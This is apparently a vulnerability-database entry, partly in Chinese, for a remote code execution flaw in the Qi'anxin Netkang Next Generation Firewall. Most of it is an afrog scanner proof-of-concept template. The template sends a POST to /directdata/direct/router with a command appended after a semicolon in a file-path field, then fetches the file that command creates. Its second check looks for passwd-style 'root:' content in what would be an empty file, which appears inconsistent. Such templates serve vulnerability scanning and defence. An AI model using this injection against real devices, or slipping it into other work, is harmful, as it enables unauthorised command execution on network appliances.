qi-anxin-netkang-next-generation-firewall-rce: Qi'anxin Netkang Next Generation Firewall - Remote Code Execution

日期: 2025-09-01 | 影响软件: Qi Anxin Netkang Next Generation Firewall | POC: 已公开

漏洞描述

Qi'anxin Netkang Next Generation Firewall is susceptible to remote code execution.

PoC代码[已公开]

id: qi-anxin-netkang-next-generation-firewall-rce

info:
  name: Qi'anxin Netkang Next Generation Firewall - Remote Code Execution
  author: pikpikcu
  severity: critical
  description: |
    Qi'anxin Netkang Next Generation Firewall is susceptible to remote code execution.
  reference:
    - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g

set:
    randstr: randomLowercase(20)
rules:
    r0:
        request:
            method: POST
            path: /directdata/direct/router
            body: |
                {"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;touch /var/www/html/{{randstr}}.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}
        expression: response.status == 200
    r1:
        request:
            method: GET
            path: /{{randstr}}.txt
        expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0() && r1()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/qi-anxin-netkang-next-generation-firewall-rce.yaml